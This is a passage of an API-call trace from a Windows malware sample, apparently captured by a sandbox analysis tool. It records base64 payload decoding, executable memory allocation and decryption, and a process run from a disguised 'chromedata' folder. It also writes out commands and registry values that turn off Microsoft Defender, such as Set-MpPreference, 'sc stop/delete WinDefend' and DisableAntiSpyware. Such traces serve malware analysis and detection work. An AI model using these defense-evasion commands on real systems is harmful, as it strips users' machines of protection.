qvHsjIrzBkK2RSeD4/BXvbuAilr7QFsjrZ14EZGBFUP2+LPDQ+WjpL2dgzuq2+PscsyLqvDlEGlLNGSlRNqMBav5PHeVQ/b/bTPaqlrxs+TQVFOnVtOHnZsn+FqcoF0cUXq7KQF60UzL25IThcu7/VVFpQjNGRkrqtQWw4eb8w5P6KyKul04tVxOqZr76Ts/SIwpCEbXhYJ0zAAUFE0I68k8fy0eOShKm+GVLaH0Wy5xFX9Yfy8hEzqT9TgVTRHUfXjG7M35mRx4a/MOTujsirpdOJVcT6na++k7vEjMKQhGhIWdHVk6mykIMWRNg5ko/4KodWNVRal85Ys5C6HkFsOPQZwz4RVr7BUq60qx/kwF6/k8cp2XLHKt2gCKWvtAayOuXXgRk8SpTUR/ATId9SAcABWT3OF1E8Unk+PgV73XioC68e8MivMFZyrNN87D5ve1a+sQeTh5iBo4meFOfU+rg3PC0BpcTKwNvE3f/VwtH8qOnEV+ksWzXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+vGpcQy2AVZTYdfUkFssTysV5XwYjU80h5GVKVnRVJB5X2FvYpve1Zg37YDHQMcC7pncWw4eQy0L3fdfVjRQcAVfQVH2Txkbym8ZG97VrCULlTAnqaIzhNZPLMhaDys8A5NDApTk98Gc84BYedjXVf3bKtV7d9oCBtXvQVErTRgbpF3P2970/UgUtOJUM6sR7miNAurMrR8urQ3V5BTSg0SMR7ZpDH6cVRq5JcHZgZpmXiPfr3OF0nmKPmeX2yhh9ZXH0DBXMmmpbxyrLM0WAS2D1d1DgEJwLEQrUlSyikw8hnH5nPdYFjRFbfdTzAbCcqJZbqY86O3mvmYlpyHmIE=", cchString=0x13ec, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.524] CryptStringToBinaryA (in: pszString="D9un1aFHR1JB70V1VEFp+Cs5RCRXeJSk5UhSQeF98QSyIv8H3dNXUEvXiWeDF81s/vw0wJCEI/PRO6+0qz6pwDC+k8cckroMhKnKJpzVL6uykHaUxAnHhqsNqf4wyqulUI3RJZC6rQyqvRCrwJAekLA+pa+0J4vqLq2+k0u/0VOQhKlUkt89tKuyCIPXL5PHhjH56hSpyqsYls4kspC6PYfpSYarwBe900erpa8Kksgcuq2+bP78tMKQhDfz0buttKspqcCwvJPHD5K6jIapyjWc1a+pspA1lMSJxYarVqn+sMirpWON0aqSuq1zqr2RqcCQVZCwvaevtDCL6q+vvpNUv9HUkoSpWZLfvLarsm+D17GRx4YX+eqKq8qrKJbOprCQuiuH6cuEq8AfvdPBqaWvP5LImritvi3+/KLCkIQ189GtrbSrPKnAqryTxwySupaGqco9nNWxqbKQN5TEl8WGq1qp/qrIq6UTjdGwkrqtLqq9h6nAkBWQsKunr7Qgi+pFrL6TXb/RPpGEqU2S31K1q7Ibg9dCkseGFfnqf6jKq1qWziCykLoRh+lNhqvAHb3TQ6ulrzKSyBi6rb4c/vwswJCEIvPRI6+0qwSpwCi+k8cUkroUhKnKJJzVN6uykCqUxBHHhqtNqf4oyqulJI3RMpC6rQqqffkx+Sr6L/MR2FCN0QGQuq0Cqr00q8CQCZCwGqWvtC2L6gqtvpNIv9FvkISpQZLfAbSrsiqD1xOTx4Y6+eooqcqrOZbOALKQuiCH6W2Gq8AWvdNjq6WvO5LIOLqtvhj+/AzAkIRWuMG6rbSrH5AQ1sgprPTRz5KEqWXfF8QaqxjnzBfd4a0Nq8CQKd1wwAqvHtzEKuXfzCDHhqtu5C7CZ6sP2MIR6anAQr+Tx36Sun6FqcpWnNVZqrKQRZTEf8aGqz+p/kLLq6VQjdFYkbqt5aq9b6rAkHuQsEOkr7RUi+pdrL6Tar/RJpGEqWaS30q1q7Iug9dakseGZvnqZ6jKq1qWzkmzkLpQh+kmh6vAb73TKqqlr0uSyE+7rb5t/vx1wZCEVvPReK60q02pwHG/k8d5krpLhanK/5zVbqqykKqUxErGhqvFqf5xy6ullo3RZZG6rTyqvVCqwJCTkLB+pK+0iovqbqy+k8O/0RORhKldkt99tauyV4PXb5LHhl356lSoyqvIls5ks5C6i4fpCYerwC290weqpa81kshcu62+B/78YMGQhN/z0W+utKvTqcBkv5PHWJK6WIWpyoOc1XOqspAXlMRVxoarI6n+bMurpcmN0XaRuq19qr1FqsCQbJCwaaSvtByL6nusvpN2v9EAkYSpD5LfELWrsiuD1wCSx4ZW+eo5qMqrqJbOF7OQuqiH6XyHq8AbvdNwqqWvHJLIKbutvrb+/BPBkISy89ESrrSrnqnAG7+Tx7mSuiWFqcphnNUAqrKQIpTEIMaGq8Wp/hvLq6U+jdEDkbqtnqq9NqrAkAOQsASkr7QYi+oUrL6TTb/RbZGEqQCS3wO1q7Jzg9cVkseG9PnqLqjKqy6WzgKzkLobh+lvh6vAjL3Tbaqlr2uSyDa7rb5//vwOwZCEJ/PRAa60q3ipwA6/k8cckroyhanKi5zVFaqykFeUxDPGhqsfqf42y6ulpY3RLJG6rbSqvRuqwJCOkLA3pK+0lYvqIay+k9W/0VqRhKlpkt82tauy/oPXJpLHhmL56hOoyqsvls49s5C64ofpUoerwMa9016qpa/XksgDu62+aP78OcGQhI3z0TSutKtBqcA9v5PH9ZK6H4Wpyuuc1TqqspDclMQexoarSqn+JcurpUON0TmRuq0/qr0MqsCQ/JCwIqSvtNSL6jKsvpNzv9FHkYSpRJLfKbWrsvuD1zuSx4bs+eoAqMqrWpbOKLOQuvKH6UWHq8ASvdNLqqWv/JLIELutvj/+/NTBkISL89HbrrSrbanA0L+TxxqSuuyFqcq6nNXPqrKQspTE6caGq7yp/tDLq6URjdHKkbqtv6q98arAkG2QsN2kr7Tzi+rPrL6TVr/RtJGEqeqS39y1q7JOg9fMkseGKfnq9ajKqyyWztuzkLqSh+moh6vA6r3TpKqlr56SyP27rb4J/vzHwZCEKfPRzq60q02pwMe/k8dakrr5hanKA5zV3KqykACUxPTGhqttqf7Py6ulUo3R15G6rdyqveKqwJCRkLDIpK+0PYvq2Ky+k5S/0aGRhKkqkt/PtauykoPX4ZLHhmv56tqoyqvWls72s5C6GIfpm4erwL+905Gqpa9KksjKu62+bP788sGQhFbz0f2utKtNqcD6v5PHeZK6xoWpylSc1eGqspBFlMTHxoarP6n++surpVCN0eCRuq1Bqr3XqsCQe5Cw+6SvtFSL6vWsvpM4v9GOkYSpNZLf4rWrsm+D1/KSx4ZU+erPqMqrWpbO4bOQulKH6Y6Hq8BvvdOCqqWvS5LI17utvmz+/O3BkIRW89HgrrSrTanA6b+Tx3mSutOFqcpUnNX2qrKQRZTE0saGqz+p/unLq6VQjdGNkbqtQaq9uKrAkHuQsJakr7RUi+qGrL6TOL/R+5GEqTSS35W1q7Jvg9eHkseGVPnqvKjKq1qWzpyzkLpSh+nxh6vAb73T/6qlr0uSyKS7rb5s/vyYwZCEVvPRl660q02pwJy/k8d5krqghanKVJzVm6qykEWUxL3Ghqs/qf6Ey6ulUI3RnpG6rUGqva2qwJB7kLCBpK+0VIvqk6y+kzi/0eiRhKk1kt+Itauyb4PXmJLHhlT56qGoyqtals6Ps5C6Uofp5IerwG+90+iqpa9Lksixu62+bP78i8GQhFbz0bqutKtNqcCzv5PHeZK6jYWpylSc1aiqspBFlMSIxoarW6n+s8urpYWN0auRuq3rqr2eqsCQypCwvKSvtPKL6qysvpM7v9HVkYSpLZLfu7Wrsv2D162Sx4ZX+eqWqMqr8JbOurOQumOH6deHq8BBvdPFqqWvA5LInrutvif+/KbBkIQz89GprrSrbanApr+Tx+CSupqFqcqZnNW9qrKQg5TEm8aGqzOp/q7Lq6VFjdG0kbqtTaq9g6rAkMSQsK+kr7Rqi+q5rL6Tx7/RwpGEqU2S3661q7L6g9e+kseGM/nqe6nKq+uWzlWykLomh+k6hqvANL3TNqulryuSyGu6rb5t/vxRwJCEVvPRXK+0q02pwFW+k8d5krpnhKnKVJzVQquykEWUxGbHhqs/qf5dyqulUI3RQZC6rUGqvXSrwJB7kLBapa+0VIvqSq2+kzi/0S+QhKk1kt9BtKuyb4PXU5PHhlT56mipyqtals5AspC6UofpLYarwG+90yOrpa9Lksh4uq2+bP78TMCQhFbz0UOvtKtNqcBIvpPHeZK6dISpylSc1VerspBFlMRxx4arP6n+SMqrpVCN0VKQuq1Bqr1Zq8CQe5CwdaWvtFSL6metvpM4v9EckISpNZLfdLSrsm+D12STx4ZU+epdqcqrWpbOc7KQulKH6RCGq8BvvdMcq6WvS5LIRbqtvmz+/H/AkIRW89F2r7SrTanAf76Tx3mSukGEqcpUnNVkq7KQRZTEXMeGqz+p/mfKq6VQjdF/kLqtQaq9SqvAkHuQsGClr7RUi+pwrb6TOL/RCZCEqTWS32e0q7Jvg9d5k8eGVPnqQqnKq1qWzm6ykLpSh+kDhqvAb73TCaulr0uSyFK6rb5s/vxqwJCEVvPRZa+0q02pwBK+k8d5krouhKnKVJzVCauykEWUxC/Hhqs/qT7+NJIf+UmSCMVFlATHOL8Rk269E5g8nBXlVIsq6lKHKYh5knre35Bw5lqWDudNqQDmTqp9zFr5Ks1b8xHtXI0R9WSDF/hm/jzuNqk+7T2SH+xMkgjSQ5QE0j2/EYBrvRP1V5wVilaLKodThyn7eZJ6q3uQcJFnlg6S+KkAlaCqfbEP+SqycfMRkEONEYZZgxeNBf48maSpPphjkh+f4pIIvxeUBL2gvxHtNL0T5v2cFZ9DiyqQdocp7mSSerhhkHCMcZYOjdGpAIimqn2iYfkqp2rzEYeZjRGTuYMXno3+PLToqT63RZIfsoeSCIw1lASIrL8R2gS9E9PEnBWshIsqrSyHKdHrknqFVZBwvwaWDrjNqQC/mqp9l7H5KpR78xGqMI0RvBqDF7Nu/jynP6j+CsqrpVBLVE0FRThABjgTVLLqJ6nKqwqvHsjIrzBkK2RSeD4/BXvbuAilr7QFsjrZ14EZGBFUP2+LPDQ+WjpL2dgzuq2+PscsyLqvDlEGlLNGSlRNqMBav5PHeVQ/b/bTPaqlrxs+TQVFOnVtOHnZsn+FqcoF0cUXq7KQF60UzL25IThcu7/VVFpQjNGRkrqtQWw4eb8w5P6KyKul04tVxOqZr76Ts/SIwpCEbXhYJ0zAAUFE0I68k8fy0eOShKm+GVLaH0Wy5xFX9Yfy8hEzqT9TgVTRHUfXjG7M35mRx4a/MOTujsirpdOJVcT6na++k7vEjMKQhGhIWdHVk6mykIMWRNg5ko/4KodWNVRal85Ys5C6HkFsOPQZwz4RVr7BUq60qx/kwF6/k8cp2XLHKt2gCKWvtAayOuXXgRk8SpTUR/ATId9SAcABWT3OF1E8Unk+PgV73XioC68e8MivMFZyrNN87D5ve1a+sQeTh5iBo4meFOfU+rg3PC0BpcTKwNvE3f/VwtH8qOnEV+ksWzXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+vGpcQy2AVZTYdfUkFssTysV5XwYjU80h5GVKVnRVJB5X2FvYpve1Zg37YDHQMcC7pncWw4eQy0L3fdfVjRQcAVfQVH2Txkbym8ZG97VrCULlTAnqaIzhNZPLMhaDys8A5NDApTk98Gc84BYedjXVf3bKtV7d9oCBtXvQVErTRgbpF3P2970/UgUtOJUM6sR7miNAurMrR8urQ3V5BTSg0SMR7ZpDH6cVRq5JcHZgZpmXiPfr3OF0nmKPmeX2yhh9ZXH0DBXMmmpbxyrLM0WAS2D1d1DgEJwLEQrUlSyikw8hnH5nPdYFjRFbfdTzAbCcqJZbqY86O3mvmYlpyHmIE=", cchString=0x13ec, dwFlags=0x1, pbBinary=0x643d4c, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x643d4c, pcbBinary=0x12fef8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.524] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0084.524] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0084.525] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0084.525] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.525] CryptStringToBinaryA (in: pszString="D9un1aHrRVJB4X2hBLIirwfdnltQS9eJZ4MXpWz+PNRUqT7XUJIf0jmSCOwrlAToXb8RugO9E7NnnBXMZosqzXyHKbEdknrlF5Bw3zaWDthNqQDmL6p9zCD5Ks0y8xHtPI0R9QODF/hC/jzuW6k+7VmSH+wnkgjSRZQE+G6/EaoGvROjJpwV3CCLKt0nhymhGJJ69ReQcM8blg7IIakAzy2qfec7+SrkNfMR+lCNEYkCgxeECf48klKpPpFWkh+YO5IIpjyUBKY49AG/PYQD4d0fvMYR+T+6B5XlfYnZcvsq3WC4CK8ejMQqmd8EqGjyGc8+hAPt3R+wwAFF5hCSyin48hk3bDNqvBmWOgs8TX9FUso59PIWbz8RVsoBhtkO5MYiiTTKPT4f3WrH8BP5W+0YX98Yo8gWS3SxPPgw2Db+Xp1yUwb4ZiJN2wyQC6sytjqPvTky0RW/Ms6vRDTIKcx243KbdOFg/GGaNhNC2ACmKqwQ8hmT5C9XJd3PLLSrsuTALr6TxylbiCKPPfx80QXn3whnRhZLeGh243KbEJ8d3w/8wBH9bAFYTTzHLLS8q3e9lN8XnMqVzW9FUsghqPIB8+Q+5jYWctkOhLI6ldmkMfu1mPOjt5r5mJach5iBOs6+woAwKgJo/+vGpcTKwNvE3f/VwtH8UP8DMm/rxqXEysDbxN3/1cLR/KjpxK//68alxMrA28Td/9XC0fyo6cSv/+s+vRpXUKNOTW9F2wSUUIPfC28T3ntZWrhDVE1vzBe9hY15VD868LpmAg0BL6t4X0VSQTSzOVi0J3fdJN8bYCFWxhJNBRGEY3lUP+q7IjHfkLus3wx3FdkZUDu632cXIwY2jNEbV98eT84JZW/weoQ8t/BkbQRZoCFVshpJBKlPOHlUuq8PXraWXtOIVqaMHWGTCrNqld1teJw2VQMPFQ/GihiQSWxt8rhuPCll/GeBY5nfCGfPQsGmWHqO7ox4EyXeUtSCtKNchdkMYAOgID4vIQ1s378NiVhN5ABayiHA8Fy0OnfdcKjTUhQKFuSgD4Kg9LWY86O3mvmYlpw=", cchString=0x42c, dwFlags=0x1, pbBinary=0x644c44, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x644c44, pcbBinary=0x12fef0, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0084.525] VirtualAlloc (lpAddress=0x0, dwSize=0x1410, flAllocationType=0x1000, flProtect=0x40) returned 0x1c0000
	[0084.525] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0084.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0084.529] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75bb0000
	[0084.539] GetProcAddress (hModule=0x76b10000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x76b98bc9
	[0084.539] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0084.539] GetProcAddress (hModule=0x774c0000, lpProcName="RegCreateKeyW") returned 0x774d1514
	[0084.539] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0084.539] GetProcAddress (hModule=0x774c0000, lpProcName="RegSetValueExW") returned 0x774d14d6
	[0084.539] GetProcAddress (hModule=0x75bb0000, lpProcName="ShellExecuteA") returned 0x75df7078
	[0084.539] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 0
	[0084.539] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0084.545] GetKeyState (nVirtKey=144) returned 0
	[0084.545] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.553] GetKeyState (nVirtKey=144) returned 0
	[0084.553] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.583] GetKeyState (nVirtKey=144) returned 0
	[0084.583] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.584] GetKeyState (nVirtKey=144) returned 0
	[0084.584] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.599] GetKeyState (nVirtKey=144) returned 0
	[0084.599] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.615] GetKeyState (nVirtKey=144) returned 0
	[0084.615] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.631] GetKeyState (nVirtKey=144) returned 0
	[0084.631] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.646] GetKeyState (nVirtKey=144) returned 0
	[0084.646] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.662] GetKeyState (nVirtKey=144) returned 0
	[0084.662] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.678] GetKeyState (nVirtKey=144) returned 0
	[0084.678] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.693] GetKeyState (nVirtKey=144) returned 0
	[0084.693] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.708] GetKeyState (nVirtKey=144) returned 0
	[0084.708] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.725] GetKeyState (nVirtKey=144) returned 0
	[0084.725] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.740] GetKeyState (nVirtKey=144) returned 0
	[0084.740] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.756] GetKeyState (nVirtKey=144) returned 0
	[0084.756] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.765] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc stop WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0084.833] GetKeyState (nVirtKey=144) returned 0
	[0084.833] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.833] GetKeyState (nVirtKey=144) returned 0
	[0084.833] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.849] GetKeyState (nVirtKey=144) returned 0
	[0084.849] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.851] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/c sc delete WinDefend", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0084.932] GetKeyState (nVirtKey=144) returned 0
	[0084.932] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.942] GetKeyState (nVirtKey=144) returned 0
	[0084.942] InvalidateRect (hWnd=0x20038, lpRect=0x0, bErase=0) returned 1
	[0084.952] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0xc0) returned 0x0
	[0084.952] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x78) returned 0x0
	[0084.952] RegSetValueExW (in: hKey=0x78, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0084.952] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2, phkResult=0x12fe28 | out: phkResult=0x12fe28*=0x98) returned 0x0
	[0084.952] RegCreateKeyW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", phkResult=0x12fe28 | out: phkResult=0x12fe28*=0xdc) returned 0x0
	[0084.952] RegSetValueExW (in: hKey=0xdc, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0084.953] RegSetValueExW (in: hKey=0xdc, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0084.953] RegSetValueExW (in: hKey=0xdc, lpValueName="DisableOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0084.953] RegSetValueExW (in: hKey=0xdc, lpValueName="DisableIOAVProtection", Reserved=0x0, dwType=0x4, lpData=0x12fe20*=0x1, cbData=0x4 | out: lpData=0x12fe20*=0x1) returned 0x0
	[0084.953] RegCloseKey (hKey=0xdc) returned 0x0
	[0084.953] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=1) returned 0
	[0084.953] Sleep (dwMilliseconds=0x3) 
	[0084.958] VirtualAlloc (lpAddress=0x0, dwSize=0xef0, flAllocationType=0x1000, flProtect=0x40) returned 0x3c0000
	[0084.958] VirtualAlloc (lpAddress=0x0, dwSize=0x320, flAllocationType=0x1000, flProtect=0x40) returned 0x3f0000
	[0084.958] ShowWindow (hWnd=0x20038, nCmdShow=0) returned 0
	[0084.959] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x774c0000
	[0084.959] GetProcAddress (hModule=0x774c0000, lpProcName="CryptAcquireContextA") returned 0x774c91dd
	[0084.959] GetProcAddress (hModule=0x774c0000, lpProcName="CryptImportKey") returned 0x774cc532
	[0084.959] GetProcAddress (hModule=0x774c0000, lpProcName="CryptEncrypt") returned 0x774e779b
	[0084.959] CryptAcquireContextA (in: phProv=0x12fd78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x0 | out: phProv=0x12fd78*=0x1f2b50) returned 1
	[0084.979] CryptImportKey (in: hProv=0x1f2b50, pbData=0x12fc2c, dwDataLen=0x134, hPubKey=0x0, dwFlags=0x0, phKey=0x12fc24 | out: phKey=0x12fc24*=0x2135b0) returned 1
	[0085.093] CryptImportKey (in: hProv=0x1f2b50, pbData=0x12fdc4, dwDataLen=0x4c, hPubKey=0x2135b0, dwFlags=0x0, phKey=0x12fe18 | out: phKey=0x12fe18*=0x2135f0) returned 1
	[0085.093] CryptEncrypt (in: hKey=0x2135f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40e148, pdwDataLen=0x12ff00*=0x28800, dwBufLen=0x28800 | out: pbData=0x40e148*, pdwDataLen=0x12ff00*=0x28800) returned 1
	[0085.098] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76b10000
	[0085.098] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77330000
	[0085.099] GetProcAddress (hModule=0x76b10000, lpProcName="VirtualAlloc") returned 0x76b62fb6
	[0085.099] GetProcAddress (hModule=0x77330000, lpProcName="memcpy") returned 0x77364cc0
	[0085.099] VirtualAlloc (lpAddress=0x0, dwSize=0x2b000, flAllocationType=0x1000, flProtect=0x40) returned 0xd20000
	[0085.111] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x12ac20 | out: BaseAddress=0x12ac20*=0x76b10000) returned 0x0
	[0085.132] GetStartupInfoW (in: lpStartupInfo=0xd490ad | out: lpStartupInfo=0xd490ad*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0085.132] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.132] Sleep (dwMilliseconds=0x1) 
	[0085.216] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ff9b0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.217] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.217] Sleep (dwMilliseconds=0x1) 
	[0085.269] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ed818*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.269] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.269] Sleep (dwMilliseconds=0x1) 
	[0085.297] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ee510*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.297] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.297] Sleep (dwMilliseconds=0x1) 
	[0085.308] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ee5a0*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.308] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.308] Sleep (dwMilliseconds=0x1) 
	[0085.317] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1ee630*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.317] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.317] Sleep (dwMilliseconds=0x1) 
	[0085.380] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe ", pNumArgs=0xd4905d | out: pNumArgs=0xd4905d) returned 0x1f3298*="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe"
	[0085.380] GetCommandLineW () returned="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe "
	[0085.380] Sleep (dwMilliseconds=0x1) 
